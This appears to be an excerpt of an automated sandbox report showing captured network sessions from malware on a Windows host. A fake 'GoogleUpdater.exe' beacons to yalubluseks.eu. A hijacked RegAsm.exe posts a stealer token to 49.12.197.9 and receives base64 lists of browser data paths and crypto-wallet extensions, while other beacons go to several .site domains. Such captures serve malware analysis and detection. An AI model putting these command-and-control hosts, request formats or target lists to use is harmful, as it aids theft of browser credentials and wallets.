                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jeDB0UjNWHymELDV8pZmrWBylb%2BsnHC0Y1wuFDXxjt9aqetvYSsvAnIhq%2FNRpoBn75zfRg75V8Ax5rrxZdoKE0l5pZuk8UElNX77zCVEhDH6EXdtUJW5e7xgKiRYR0b2LVab"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c727aab342db-EWR
                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          16192.168.2.658531172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC167OUTPOST /receive.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC84OUTData Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63
                                                                                                                                                                                                                                          Data Ascii: ip=8.46.123.33&hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:25 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WY1mTSVuTqMsZ8rf4TbUhdDmo1f4NISlIN8%2F%2BN9jl%2BK99LE96VVpwqThBY2PQCt04F%2FezpPgK3%2F66swQuLRMdNtHOPFfNVZcpWcs9h2dqoYm3LkbCjL691UdMJWFPcV0Ig%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c72b5fc0425f-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          17192.168.2.65853249.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----CFIEBKEHCAKFCBFIDAAK
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 42 4b 45 48 43 41 4b 46 43 42 46 49 44 41 41 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------CFIEBKEHCAKFCBFIDAAKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFIEBKEHCAKFCBFIDAAKCont
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:26 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                                                                                                                                                                                          Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          18192.168.2.658533104.21.18.1934436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: snarlypagowo.site
                                                                                                                                                                                                                                          2024-10-02 12:43:25 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC780INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:26 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=ip5d61853c8tercfaqel26pd1g; expires=Sun, 26 Jan 2025 06:30:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=crBtmDPBVfIX4iSWbNn3Tz7QrNdCDvZA%2B7xo4ro%2B0FIGVqNOcXLhAuFMzx8bEYV8%2Fa9HKMpSfdLW11jSUbc0Qe14aIj%2FqwE%2F8NaORLaAhNoFAB4BHjSMbsODlsoHWWg%2BNDSEjQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c72ec9af42ea-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          19192.168.2.658534172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC144OUTPOST /get_file.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 84
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC84OUTData Raw: 68 77 69 64 3d 64 31 65 62 37 39 63 63 61 63 65 32 65 32 62 31 34 34 33 35 64 64 65 30 35 39 63 64 32 61 63 35 65 62 32 39 37 39 38 33 65 35 35 64 64 63 61 65 62 61 32 37 63 62 37 63 36 65 35 61 66 36 64 63 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                          Data Ascii: hwid=d1eb79ccace2e2b14435dde059cd2ac5eb297983e55ddcaeba27cb7c6e5af6dc&ip=8.46.123.33
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:26 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YhgZrdLL5FulPWHMMk4%2BFrEaGewLrvRtgzGGNiAwm7uxEnr%2BHwSMqRbNbA0QZdLaUxpDTbxJmGo9mtdAIfMWMMOLN8M2n7b4%2BttGpshhWUxtED%2BNSLBtld56f1DC8ul2Lg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7325980176c-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          20192.168.2.658536172.67.195.674436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: mysterisop.site
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC766INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:27 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=eld9rih27957ghdksm3f4d956g; expires=Sun, 26 Jan 2025 06:30:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eFYEH5FgFMFlmfyAdiPD18c7Mkgh4QPbzHixIU47OUN4qg0TedtyfcvvdmqCgYRUS6CDoQ2D3z1aBkUa8kZROYennsMjsiCL2QWPj0u82%2Fz64Lbm1UtxvX2BFAbpO7D%2BdTU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c7349efcc352-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          21192.168.2.65853549.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----KFCBAEHCAEGDHJKFHJKF
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 43 42 41 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------KFCBAEHCAEGDHJKFHJKFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KFCBAEHCAEGDHJKFHJKFCont
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:27 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                          Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          22192.168.2.658537172.67.140.924436320C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC146OUTPOST /get_update.php HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          Host: yalubluseks.eu
                                                                                                                                                                                                                                          Content-Length: 19
                                                                                                                                                                                                                                          Expect: 100-continue
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC25INHTTP/1.1 100 Continue
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC19OUTData Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33
                                                                                                                                                                                                                                          Data Ascii: current_version=0.3
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC607INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:27 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QO1kwxDAlCUH%2FkwU2HGsC7oET0%2FagBkijBm%2BM7UhBAoR4SrhUHQDI8iojRxbMv8AVrbieCQ2wgPTsaZdn13tmbw0R2LEZL5blzA0zgKwaNWGkpzUHAMoqjoobU6wrVYTcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c73808568c06-EWR
                                                                                                                                                                                                                                          0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          23192.168.2.658538104.21.17.1744436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                          Content-Length: 8
                                                                                                                                                                                                                                          Host: absorptioniw.site
                                                                                                                                                                                                                                          2024-10-02 12:43:27 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                          Data Ascii: act=life
                                                                                                                                                                                                                                          2024-10-02 12:43:28 UTC776INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:28 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=19t49pmrpokthkd15al5tl9eou; expires=Sun, 26 Jan 2025 06:30:07 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XZUlpV4bUkHMoogXXfrCGB2xghDr0Ye65iCqnx7ROViOjS%2FuI%2BeCtCsefyexhfERzYnnKIdHtxDbqCS4MGcs7phIzK1J2XUKzPCPcKnr6qgcqmq2TJGDjMyud%2B%2BsUyf5tCQ6Rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                          CF-RAY: 8cc4c73b28d7423f-EWR
                                                                                                                                                                                                                                          2024-10-02 12:43:28 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                                                                                                                                                                          Data Ascii: aerror #D12
                                                                                                                                                                                                                                          2024-10-02 12:43:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          24192.168.2.65853949.12.197.94436208C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                          2024-10-02 12:43:28 UTC276OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                                                                                          Host: 49.12.197.9
                                                                                                                                                                                                                                          Content-Length: 332
                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                          2024-10-02 12:43:28 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 34 65 64 66 38 31 36 61 64 33 66 33 63 65 61 39 39 36 65 35 61 61 39 62 33 30 31 63 61 30 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                          Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"3b4edf816ad3f3cea996e5aa9b301ca0------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------IEHCAKKJDBKKFHJJDHIICont
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 12:43:28 GMT
                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                          2024-10-02 12:43:29 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                          25192.168.2.658541104.102.49.2544436904C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
